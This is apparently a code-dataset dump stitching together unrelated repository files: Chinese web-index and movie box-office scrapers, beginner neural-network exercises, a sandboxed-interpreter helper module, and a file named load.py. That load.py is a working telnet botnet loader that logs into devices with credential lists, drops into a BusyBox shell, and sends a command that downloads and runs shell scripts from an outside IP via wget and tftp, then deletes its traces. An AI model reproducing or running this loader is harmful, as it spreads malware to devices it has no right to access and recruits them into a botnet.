encrypt_data = data.get('userIndexes') or data.get('index') or data.get('result')
return encrypt_data
def get_key(self):
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_data_key, params={'uniqid':self._uniqid}, headers=cookie)
self._key = resp.json()['data']
return self._key
@staticmethod
def decrypt(key, data):
"""decrypt data."""
kv = {key[i]: key[len(key)//2+i] for i in range(len(key)//2)}
dec = ''.join([kv[i] for i in data])
return dec.split(',')
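    # Sketch of the key scheme (hypothetical key/data for illustration): the
    # first half of `key` lists cipher characters and the second half their
    # plaintext, so key = 'ab1,' maps 'a'->'1' and 'b'->','. Then
    #   decrypt('ab1,', 'aba') -> '1,1'.split(',') == ['1', '1']
    # i.e. two decoded daily index values.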
class SogouIndex(BaseIndex):
"""Sogou search index.
Usage::
>>> idx = SogouIndex()
>>> idx.search('股票',begin='-3m')
"""
head = {'Origin': 'http://zhishu.sogou.com',
'Referer':'http://zhishu.sogou.com'}
dkey = {'all': 'SEARCH_ALL',
'pc': 'SEARCH_PC',
'mobile': 'SEARCH_WAP',
'wechat': 'MEDIA_WECHAT'}
    def __init__(self, keyword='', begin='-1m', end=None, data_type='all'):
        end = end if end is not None else arrow.now()  # evaluate at call time, not at class definition
        self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
        self.start_date = arrow.get(str2date(begin).date())  # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self.data_type = data_type
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related sogou index data.
:param keyword: sogou index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:param data_type: (optional) data type, default is `all`.
value: all, pc, mobile, wechat
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date):
for k,d in zip(self._keywords, self.get_data(st, ed)):
self._result[k] += [i['pv'] for i in d]
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def get_data(self, start_date, end_date):
"""get data."""
params = {
'kwdNamesStr': ','.join(self._keywords),
'startDate': start_date.format('YYYYMMDD'),
'endDate': end_date.format('YYYYMMDD'),
'dataType': self.dkey[self.data_type],
'queryType': 'INPUT'
}
resp = sess.get(api.sogou_search_index, params=params, headers=self.head)
data = resp.json()['data']['pvList']
return data
class ToutiaoIndex(BaseIndex):
"""Toutiao search index.
Usage::
>>> idx = ToutiaoIndex()
>>> idx.search('股票',begin='-3m')
"""
head = {'Origin': 'https://index.toutiao.com',
'Referer':'https://index.toutiao.com'}
    def __init__(self, keyword='', begin='-1m', end=None):
        end = end if end is not None else arrow.now()  # evaluate at call time, not at class definition
        self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
        self.start_date = arrow.get(str2date(begin).date())  # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related toutiao index data.
:param keyword: toutiao index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date, 'month'):
for k,d in zip(self._keywords, self.get_data(st, ed)):
self._result[k] += d
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result.applymap(lambda x: int(x))
def get_data(self, start_date, end_date):
"""get data."""
for i in self._keywords:
params = {'region': 0, 'category': 0,
'is_hourly': 0, 'keyword': i,
'start': start_date.format('YYYYMMDD'),
'end': end_date.format('YYYYMMDD')}
resp = sess.get(api.toutiao_search_index, params=params, headers=self.head)
yield resp.json()['trends'][i]
```
#### File: xueqiu/xueqiu/movie.py
```python
from . import api
from .utils import sess
from lxml import html
import pandas as pd
import numpy as np
import arrow
import json
head = {
'Origin':'https://piaofang.maoyan.com',
'Referer':'https://piaofang.maoyan.com',
'X-Requested-With':''
}
def get_movie_id(search: str):
resp = sess.get(api.movie_search%search, headers=head)
tree = html.fromstring(resp.text)
title = tree.xpath('//article/div/text()')
mid = tree.xpath('//article/@data-url')
return [[k.split('/')[-1],v] for k,v in zip(mid,title)]
def get_movie_boxinfo_byid(mid: int):
"""movie box office history data."""
def process_data(x):
x = x.find('<')>=0 and x[1:] or x
if x.find('万')>=0:
x = float(x[:-1])*10000
elif x.find('%')>=0:
x = float(x[:-1])/100
elif x == '--':
x = np.nan
return float(x)
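    # process_data normalises maoyan's display strings: a leading '<' marker is
    # dropped, values quoted in 万 are scaled to raw counts (x10000),
    # percentages become fractions, and '--' becomes NaN.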
resp = sess.get(api.movie_history % mid, headers=head)
tree = html.fromstring(resp.text)
dt = json.loads(tree.xpath('//script[@id="pageData"]/text()')[0])
column = [i['name'] for i in dt['boxDatas'][0]['indicatrixs']]
index = pd.to_datetime([i['showDate'] for i in dt['boxDatas'][0]['data']])
data = [i['selectData'] for i in dt['boxDatas'][0]['data']]
df = pd.DataFrame(data, columns=column, index=index).applymap(process_data)
df[['分账票房','综合票房']] = df[['分账票房','综合票房']].applymap(lambda x:x*10000)
return {'id':dt['movieId'], 'name':dt['movieName'], 'data':df}
def get_movie_boxinfo_live(date: str = ''):
"""movie box office live data."""
param = date and {'beginDate':arrow.get(date).format('YYYYMMDD')} or {}
resp = sess.get(api.movie_live, params=param, headers=head)
dt = resp.json()['data']
column = ('id,名称,分账票房,分账票房占比,综合票房,综合票房占比,排片场次,排片占比,'
'排座占比,场均人次,上座率,综合票价,分账票价,网售占比,猫眼退票人次,猫眼退票率,'
'大盘退票人次,大盘退票率,观影人数,累计票房,分账累计票房')
data = [[
i['movieId'],i['movieName'],i['splitBoxInfo'],i['splitBoxRate'],
i['boxInfo'],i['boxRate'],i['showInfo'],i['showRate'],i['seatRate'],
i['avgShowView'],i['avgSeatView'],i['avgViewBox'],i['splitAvgViewBox'],
i['onlineBoxRate'],i['myRefundNumInfo'],i['myRefundRateInfo'],i['refundViewInfo'],
i['refundViewRate'],i['viewInfo'],i['sumBoxInfo'],i['splitSumBoxInfo']
] for i in dt['list']]
return {
'split_total_box': dt['splitTotalBox'],
'total_box': dt['totalBox'],
'maoyan_view': dt['crystal']['maoyanViewInfo'],
'online_view': dt['crystal'].get('onlineViewInfo'),
'total_view': dt['crystal']['viewInfo'],
'data': pd.DataFrame(data, columns=column.split(','))
}
``` |
{
"source": "1doudou1/Neural-Network",
"score": 3
} |
#### File: Neural-Network/C1_W3/Main.py
```python
import numpy as np
import matplotlib.pyplot as plt
from testCases import *
import sklearn
import sklearn.datasets
import sklearn.linear_model
from planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets
np.random.seed(1)
# Here comes the Function
X,Y = load_planar_dataset() # X holds the points and Y the labels
plt.scatter(X[0,:],X[1,:],c=Y,s=40,cmap=plt.cm.Spectral)
shape_X = X.shape # The raw data
shape_Y = Y.shape # The label of data
m = Y.shape[1] # total number of samples (400 here)
print("The dimension for X is "+str(shape_X))
print("THe dimension for Y is "+str(shape_Y))
print("The dataset has total data "+ str(m))
clf = sklearn.linear_model.LogisticRegressionCV()
clf.fit(X.T,Y.T)
plot_decision_boundary(lambda x: clf.predict(x),X,Y)
plt.title("Logistic Regression")
LR_predictions = clf.predict(X.T)
print("The accuracy for logistic regression is %d" %float((np.dot(Y,LR_predictions)+\
    np.dot(1-Y,1-LR_predictions))/float(Y.size)*100)+"% of points labelled correctly")
# print formatting note: literal text lives inside the quotes; values are interpolated with %-formatting
def layer_sizes(X,Y):
n_x = X.shape[0] # Input layer
n_h = 4 # Hidden layer
n_y = Y.shape[0] # Output layer
return(n_x,n_h,n_y)
def initialize_parameters(n_x,n_h,n_y):
np.random.seed(2)
w1 = np.random.randn(n_h,n_x)*0.01
b1 = np.zeros(shape=(n_h,1))
w2 = np.random.randn(n_y,n_h)*0.01
b2 = np.zeros(shape=(n_y,1))
assert(w1.shape == (n_h,n_x))
assert(b1.shape == (n_h,1))
assert(w2.shape == (n_y,n_h))
assert(b2.shape == (n_y,1))
parameters = {"w1" : w1,
"b1" : b1,
"w2" : w2,
"b2" : b2
}
return parameters
def forward_propagation(X, parameters):
w1 = parameters["w1"]
b1 = parameters["b1"]
w2 = parameters["w2"]
b2 = parameters["b2"]
Z1 = np.dot(w1,X) + b1
A1 = np.tanh(Z1)
Z2 = np.dot(w2,A1) + b2
A2 = sigmoid(Z2)
assert(A2.shape == (1,X.shape[1]))
cache = {"Z1" : Z1,
"A1" : A1,
"Z2" : Z2,
"A2" : A2
}
return(A2,cache)
def compute_cost(A2,Y,parameters):
m = Y.shape[1]
w1 = parameters["w1"]
w2 = parameters["w2"]
logprobs = np.multiply(np.log(A2),Y) + np.multiply((1-Y),np.log(1-A2))
cost = - np.sum(logprobs) / m
cost = float(np.squeeze(cost))
assert(isinstance(cost,float))
return cost
def backward_propagation(parameters,cache,X,Y):
m = X.shape[1]
w1 = parameters["w1"]
w2 = parameters["w2"]
A1 = cache["A1"]
A2 = cache["A2"]
dZ2 = A2 - Y
dw2 = (1/m) * np.dot(dZ2, A1.T)
db2 = (1/m) * np.sum(dZ2,axis=1,keepdims=True)
dZ1 = np.multiply(np.dot(w2.T,dZ2),1-np.power(A1,2))
dw1 = (1/m)*np.dot(dZ1,X.T)
db1 = (1/m)*np.sum(dZ1,axis=1,keepdims=True)
grads = {"dw1":dw1,
"db1":db1,
"dw2":dw2,
"db2":db2
}
return grads
def update_parameters(parameters,grads,learning_rate=1.2):
w1,w2 = parameters["w1"],parameters["w2"]
b1,b2 = parameters["b1"],parameters["b2"]
dw1,dw2 = grads["dw1"],grads["dw2"]
db1,db2 = grads["db1"],grads["db2"]
w1 = w1 - learning_rate * dw1
b1 = b1 - learning_rate * db1
w2 = w2 - learning_rate * dw2
b2 = b2 - learning_rate * db2
parameters = { "w1":w1,
"b1":b1,
"w2":w2,
"b2":b2
}
return parameters
def nn_model(X,Y,n_h,num_iterations,print_cost=False):
np.random.seed(3)
n_x = layer_sizes(X,Y)[0]
n_y = layer_sizes(X,Y)[2]
parameters = initialize_parameters(n_x,n_h,n_y)
w1 = parameters["w1"]
b1 = parameters["b1"]
w2 = parameters["w2"]
b2 = parameters["b2"]
for i in range(num_iterations):
A2, cache = forward_propagation(X,parameters)
cost = compute_cost(A2,Y,parameters)
grads = backward_propagation(parameters,cache,X,Y)
parameters = update_parameters(parameters,grads,learning_rate = 0.5)
if print_cost:
if i%1000 ==0:
print("The",i,"iteration cost is "+str(cost))
return parameters
def predict(parameters,X):
A2, cache = forward_propagation(X,parameters)
predictions = np.round(A2)
return predictions
#--------------------MAIN FUNCTION--------------------------
parameters = nn_model(X,Y,n_h = 4, num_iterations=10000, print_cost=True)
plot_decision_boundary(lambda x: predict(parameters,x.T),X,Y)
plt.title("Decision Boundary for hidden layer size" +str(4))
predictions = predict(parameters,X)
print('The accuracy is %d' %float((np.dot(Y,predictions.T)+np.dot(1-Y,1-predictions.T))/float(Y.size)*100)+'%')
#-------------------END OF MAIN FUNCTION------------------------
plt.figure(figsize=(16,32))
hidden_layer_sizes = [1,2,3,4,5,20,50] # The number of hidden layer
for i,n_h in enumerate(hidden_layer_sizes):
plt.subplot(5,2,i+1)
plt.title('Hidden Layer of size %d' %n_h)
parameters = nn_model(X,Y,n_h,num_iterations=5000)
plot_decision_boundary(lambda x:predict(parameters,x.T),X,Y)
predictions = predict(parameters,X)
accuracy = float((np.dot(Y,predictions.T)+np.dot(1-Y,1-predictions.T))\
/float(Y.size)*100)
print("THE NUMBER OF HIDDEN LAYER:{} Accuracy:{} %".format(n_h,accuracy))
```
#### File: Neural-Network/C1_W4/Multi-layer_nn.py
```python
import numpy as np
import h5py
import matplotlib.pyplot as plt
import testCases
from dnn_utils import sigmoid, sigmoid_backward, relu, relu_backward
import lr_utils
np.random.seed(1)
#-------------------Programming Area------------------------------------------
train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = lr_utils.load_dataset()
train_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T
test_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T
train_x = train_x_flatten / 255
train_y = train_set_y
test_x = test_x_flatten / 255
test_y = test_set_y
layers_dims = [12288,30,7,5,1]  # layer sizes: input 12288, hidden 30/7/5, output 1
# These dimensions determine the shape of each layer's weight matrix and bias vector
def initialize_parameters_deep(layers_dims):
np.random.seed(3)
parameters = {} # dictionary
L=len(layers_dims)
for l in range(1,L): # For Each layer. 1-5 in this case
parameters["W"+str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1])/np.sqrt(layers_dims[l-1]) # All the column stroge the input feature and all the rows representing the number of nodes in next layer
parameters["b"+str(l)] = np.zeros((layers_dims[l],1))
assert(parameters["W"+str(l)].shape == (layers_dims[l],layers_dims[l-1]))
assert(parameters["b"+str(l)].shape == (layers_dims[l],1))
return parameters
# Forward propagation over every layer, given the input data and the parameters
def L_model_forward(X,parameters):
caches = []
    A = X  # X is actually the training data
    L = len(parameters) // 2  # each layer contributes a W and a b, so halve the dict size
for l in range(1,L):
A_prev = A
A, cache = linear_activation_forward(A_prev, parameters['W'+str(l)],\
parameters['b'+str(l)],"relu")
caches.append(cache)
AL , cache = linear_activation_forward(A,parameters['W'+str(L)],parameters['b'+str(L)],\
"sigmoid")
caches.append(cache)
assert(AL.shape == (1,X.shape[1]))
return AL, caches
# Calculating the cost
def compute_cost(AL,Y):
m=Y.shape[1]
cost = -np.sum(np.multiply(np.log(AL),Y)+np.multiply(np.log(1-AL),1-Y))/m
    cost = np.squeeze(cost)  # strip singleton dimensions so cost is a plain scalar
assert(cost.shape == ())
return cost
# Through the cost we derive the grads
def L_model_backward(AL,Y,caches):
grads = {}
L = len(caches)
m = AL.shape[1]
Y = Y.reshape(AL.shape)
dAL = -(np.divide(Y,AL) - np.divide(1-Y,1-AL))
current_cache = caches[L-1]
grads["dA"+str(L)],grads["dW"+str(L)],grads["db"+str(L)] = linear_activation_backward(dAL,current_cache,"sigmoid")
for l in reversed(range(L-1)):
current_cache = caches[l]
dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads["dA"+str(l+2)],current_cache,"relu")
grads["dA"+str(l+1)] = dA_prev_temp
grads["dW"+str(l+1)] = dW_temp
grads["db"+str(l+1)] = db_temp
return grads
# Through the parameters, grads and the hyper-parameter learning_rate, we finish the update
def update_parameters(parameters,grads,learning_rate):
L=len(parameters) //2
for l in range(L):
parameters["W"+str(l+1)] = parameters["W"+str(l+1)] - learning_rate * grads["dW"+str(l+1)]
parameters["b"+str(l+1)] = parameters["b"+str(l+1)] - learning_rate * grads["db"+str(l+1)]
return parameters
#-------------------------------- Finish one circuit ---------------------------
def initialize_parameters(n_x,n_h,n_y):
    w1 = np.random.randn(n_h,n_x)*0.01  # each hidden node connects to every input feature
    b1 = np.zeros((n_h,1))              # one bias per hidden node
    w2 = np.random.randn(n_y,n_h)*0.01  # each output node connects to all n_h hidden nodes
    b2 = np.zeros((n_y,1))              # initialize the biases to 0
    assert(w1.shape == (n_h,n_x))       # asserts surface shape mistakes in the inputs immediately
assert(b1.shape == (n_h,1))
assert(w2.shape == (n_y,n_h))
assert(b2.shape == (n_y,1))
parameters={"w1": w1,
"b1": b1,
"w2": w2,
"b2": b2
}
return parameters
def linear_activation_forward(A_prev,W,b,activation):
if activation == "sigmoid":
Z,linear_cache = linear_forward(A_prev,W,b)
A,activation_cache = sigmoid(Z)
elif activation == "relu":
Z,linear_cache = linear_forward(A_prev,W,b)
A, activation_cache = relu(Z)
assert(A.shape == (W.shape[0],A_prev.shape[1]))
cache = (linear_cache, activation_cache)
return A, cache
def linear_forward(A,W,b):
Z=np.dot(W,A)+b
assert(Z.shape == (W.shape[0],A.shape[1]))
cache=(A,W,b)
return Z,cache
def linear_backward(dZ,cache):
A_prev, W, b=cache
m = A_prev.shape[1]
dW = np.dot(dZ, A_prev.T) /m
db = np.sum(dZ,axis=1, keepdims=True) / m
dA_prev = np.dot(W.T,dZ)
assert(dA_prev.shape == A_prev.shape)
assert(dW.shape == W.shape)
assert(db.shape == b.shape)
return dA_prev, dW, db
def linear_activation_backward(dA,cache, activation = "relu"):
linear_cache, activation_cache = cache
if activation == "relu":
dZ = relu_backward(dA,activation_cache)
dA_prev, dW, db = linear_backward(dZ,linear_cache)
elif activation == "sigmoid":
dZ = sigmoid_backward(dA,activation_cache)
dA_prev,dW,db = linear_backward(dZ,linear_cache)
return dA_prev, dW, db
def Main(X,Y,layer_dims,learning_rate=0.0075,num_iterations=3000, print_cost=False, isPlot = True):
np.random.seed(1)
costs = []
parameters = initialize_parameters_deep(layers_dims)
for i in range(0,num_iterations):
AL, caches = L_model_forward(X,parameters)
cost = compute_cost(AL, Y)
grads = L_model_backward(AL,Y,caches)
parameters = update_parameters(parameters,grads,learning_rate)
if i % 100 == 0:
costs.append(cost)
if print_cost:
print("The",i,"iteration cost is ", np.squeeze(cost))
if isPlot:
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations(per tens)')
plt.title("Learning rate = " + str(learning_rate))
plt.show()
return parameters
parameters = Main(train_x,train_y,layers_dims,learning_rate=0.0075,num_iterations=2500,print_cost=True,isPlot=True)
# Code called directly by the script needs to come at the end(?); the definition order of the other functions seems arbitrary(?)
``` |
{
"source": "1Dragos12/arhive",
"score": 2
} |
#### File: arhive/hrdmv1/load.py
```python
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /run || cd /; wget http://172.16.31.10/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; tftp 172.16.31.10 -c get axistftp1.sh; chmod 777 axistftp1.sh; sh axistftp1.sh; tftp -r axistftp2.sh -g 172.16.31.10; chmod 777 axistftp2.sh; sh axistftp2.sh; rm -rf axisbins.sh axistftp1.sh axistftp2.sh; rm -rf *" #payload goes here
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mBot is joining :] !\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
        password=xinfo[2]
time.sleep(0.01)
except:
pass
session.join()
``` |
{
"source": "1drturtle/draconic",
"score": 3
} |
#### File: draconic/draconic/helpers.py
```python
import ast
import operator as op
from collections import UserList
from .exceptions import *
__all__ = ("DraconicConfig", "OperatorMixin", "approx_len_of", "safe_dict", "safe_list", "safe_set")
# ===== config =====
DISALLOW_PREFIXES = ['_', 'func_']
DISALLOW_METHODS = ['format', 'format_map', 'mro']
class DraconicConfig:
"""A configuration object to pass into the Draconic interpreter."""
def __init__(self, max_const_len=200000, max_loops=10000, max_statements=100000, max_power_base=1000000,
max_power=1000, disallow_prefixes=None, disallow_methods=None,
default_names=None, builtins_extend_default=True, max_int_size=64):
"""
Configuration object for the Draconic interpreter.
:param int max_const_len: The maximum length literal that should be allowed to be constructed.
:param int max_loops: The maximum total number of loops allowed per execution.
:param int max_statements: The maximum total number of statements allowed per execution.
:param int max_power_base: The maximum power base (x in x ** y)
:param int max_power: The maximum power (y in x ** y)
:param list disallow_prefixes: A list of str - attributes starting with any of these will be inaccessible
:param list disallow_methods: A list of str - methods named these will not be callable
:param dict default_names: A dict of str: Any - default names in the runtime
:param bool builtins_extend_default: If False, ``builtins`` to the interpreter overrides default names
:param int max_int_size: The maximum allowed size of integers (-2^(pow-1) to 2^(pow-1)-1). Default 64.
Integers can technically reach up to double this size before size check. *Not* the max value!
"""
if disallow_prefixes is None:
disallow_prefixes = DISALLOW_PREFIXES
if disallow_methods is None:
disallow_methods = DISALLOW_METHODS
self.max_const_len = max_const_len
self.max_loops = max_loops
self.max_statements = max_statements
self.max_power_base = max_power_base
self.max_power = max_power
self.max_int_size = max_int_size
self.min_int = -(2 ** (max_int_size - 1))
self.max_int = (2 ** (max_int_size - 1)) - 1
self.disallow_prefixes = disallow_prefixes
self.disallow_methods = disallow_methods
self.builtins_extend_default = builtins_extend_default
# types
self._list = safe_list(self)
self._dict = safe_dict(self)
self._set = safe_set(self)
# default names
if default_names is None:
default_names = self._default_names()
self.default_names = default_names
@property
def list(self):
return self._list
@property
def dict(self):
return self._dict
@property
def set(self):
return self._set
def _default_names(self):
return {
"True": True, "False": False, "None": None,
# functions
"bool": bool, "int": int, "float": float, "str": str, "tuple": tuple,
"dict": self.dict, "list": self.list, "set": self.set
}
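# A minimal usage sketch (the values below are illustrative, not the defaults):
#
#   config = DraconicConfig(max_const_len=10_000, max_loops=1_000)
#   long_list = config.list([0] * 100)  # the length-checked list type
#
# The interpreter consumes this object; the safe container classes returned by
# config.list / config.dict / config.set close over its limits.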
# ===== operators =====
class OperatorMixin:
"""A mixin class to provide the operators."""
def __init__(self, config):
"""
:type config: draconic.helpers.DraconicConfig
"""
self._config = config
self.operators = {
# binary
ast.Add: self._safe_add,
ast.Sub: self._safe_sub,
ast.Mult: self._safe_mult,
ast.Div: op.truediv,
ast.FloorDiv: op.floordiv,
ast.Pow: self._safe_power,
ast.Mod: op.mod,
ast.LShift: self._safe_lshift,
ast.RShift: op.rshift,
ast.BitOr: op.or_,
ast.BitXor: op.xor,
ast.BitAnd: op.and_,
ast.Invert: op.invert,
# unary
ast.Not: op.not_,
ast.USub: op.neg,
ast.UAdd: op.pos,
# comparison
ast.Eq: op.eq,
ast.NotEq: op.ne,
ast.Gt: op.gt,
ast.Lt: op.lt,
ast.GtE: op.ge,
ast.LtE: op.le,
ast.In: lambda x, y: op.contains(y, x),
ast.NotIn: lambda x, y: not op.contains(y, x),
ast.Is: lambda x, y: x is y,
ast.IsNot: lambda x, y: x is not y,
}
def _safe_power(self, a, b):
"""Exponent: limit power base and power to prevent CPU-locking computation"""
if abs(a) > self._config.max_power_base or abs(b) > self._config.max_power:
_raise_in_context(NumberTooHigh, f"{a} ** {b} is too large of an exponent")
result = a ** b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "This exponent would create a number too large")
return result
def _safe_mult(self, a, b):
"""Multiplication: limit the size of iterables that can be created, and the max size of ints"""
# sequences can only be multiplied by ints, so this is safe
self._check_binop_operands(a, b)
if isinstance(b, int) and b * approx_len_of(a) > self._config.max_const_len:
_raise_in_context(IterableTooLong, 'Multiplying these two would create something too long')
if isinstance(a, int) and a * approx_len_of(b) > self._config.max_const_len:
_raise_in_context(IterableTooLong, 'Multiplying these two would create something too long')
result = a * b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Multiplying these two would create a number too large")
return result
def _safe_add(self, a, b):
"""Addition: limit the size of iterables that can be created, and the max size of ints"""
self._check_binop_operands(a, b)
if approx_len_of(a) + approx_len_of(b) > self._config.max_const_len:
_raise_in_context(IterableTooLong, "Adding these two would create something too long")
result = a + b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Adding these two would create a number too large")
return result
def _safe_sub(self, a, b):
"""Addition: limit the max size of ints"""
self._check_binop_operands(a, b)
result = a - b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Subtracting these two would create a number too large")
return result
def _safe_lshift(self, a, b):
"""Left Bit-Shift: limit the size of integers/floats to prevent CPU-locking computation"""
self._check_binop_operands(a, b)
if isinstance(b, int) and b > self._config.max_int_size - 2:
_raise_in_context(NumberTooHigh, f"{a} << {b} is too large of a shift")
        result = a << b
        if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
            _raise_in_context(NumberTooHigh, "Shifting these two would create a number too large")
        return result  # return the checked value rather than shifting a second time
def _check_binop_operands(self, a, b):
"""Ensures both operands of a binary operation are safe (int limit)."""
if isinstance(a, int) and (a < self._config.min_int or a > self._config.max_int):
_raise_in_context(NumberTooHigh, "This number is too large")
if isinstance(b, int) and (b < self._config.min_int or b > self._config.max_int):
_raise_in_context(NumberTooHigh, "This number is too large")
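    # Illustrative numbers with the default 64-bit config: 2 ** 63 passes the
    # base/exponent caps but its result overflows max_int and is rejected
    # afterwards, while something like 10 ** 2000 is rejected up front by the
    # exponent cap.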
def approx_len_of(obj, visited=None):
"""Gets the approximate size of an object (including recursive objects)."""
if isinstance(obj, str):
return len(obj)
if hasattr(obj, "__approx_len__"):
return obj.__approx_len__
if visited is None:
visited = [obj]
size = op.length_hint(obj)
if isinstance(obj, dict):
obj = obj.items()
try:
for child in iter(obj):
if child in visited:
continue
size += approx_len_of(child, visited)
visited.append(child)
except TypeError: # object is not iterable
pass
try:
setattr(obj, "__approx_len__", size)
except AttributeError:
pass
return size
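# Rough illustration (hypothetical values): for nested = [["ab", "cd"], "efg"],
# the size is hint(outer) + hint(inner) + 2 + 2 + 3. The result is memoised on
# the object as __approx_len__ wherever attributes can be set, which lets the
# safe containers below keep it up to date incrementally instead of re-walking
# their contents on every mutation.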
# ===== compound types =====
# each function is a function that returns a class based on Draconic config
# ... look, it works
def safe_list(config):
class SafeList(UserList): # extends UserList so that [x] * y returns a SafeList, not a list
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def append(self, obj):
if approx_len_of(self) + 1 > config.max_const_len:
_raise_in_context(IterableTooLong, "This list is too long")
super().append(obj)
self.__approx_len__ += 1
def extend(self, iterable):
other_len = approx_len_of(iterable)
if approx_len_of(self) + other_len > config.max_const_len:
_raise_in_context(IterableTooLong, "This list is too long")
super().extend(iterable)
self.__approx_len__ += other_len
def pop(self, i=-1):
retval = super().pop(i)
self.__approx_len__ -= 1
return retval
def remove(self, item):
super().remove(item)
self.__approx_len__ -= 1
def clear(self):
super().clear()
self.__approx_len__ = 0
def __mul__(self, n):
# to prevent the recalculation of the length on list mult we manually set a new instance's
# data and approx len (JIRA-54)
new = SafeList()
new.data = self.data * n
new.__approx_len__ = self.__approx_len__ * n
return new
return SafeList
def safe_set(config):
class SafeSet(set):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def update(self, *s):
other_lens = sum(approx_len_of(other) for other in s)
if approx_len_of(self) + other_lens > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
super().update(*s)
self.__approx_len__ += other_lens
def add(self, element):
if approx_len_of(self) + 1 > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
super().add(element)
self.__approx_len__ += 1
def union(self, *s):
if approx_len_of(self) + sum(approx_len_of(other) for other in s) > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
return SafeSet(super().union(*s))
def pop(self):
retval = super().pop()
self.__approx_len__ -= 1
return retval
def remove(self, element):
super().remove(element)
self.__approx_len__ -= 1
def discard(self, element):
super().discard(element)
self.__approx_len__ -= 1
def clear(self):
super().clear()
self.__approx_len__ = 0
return SafeSet
def safe_dict(config):
class SafeDict(dict):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def update(self, other_dict=None, **kvs):
if other_dict is None:
other_dict = {}
other_lens = approx_len_of(other_dict) + approx_len_of(kvs)
if approx_len_of(self) + other_lens > config.max_const_len:
_raise_in_context(IterableTooLong, "This dict is too large")
super().update(other_dict, **kvs)
self.__approx_len__ += other_lens
def __setitem__(self, key, value):
other_len = approx_len_of(value)
if approx_len_of(self) + other_len > config.max_const_len:
_raise_in_context(IterableTooLong, "This dict is too large")
self.__approx_len__ += other_len
return super().__setitem__(key, value)
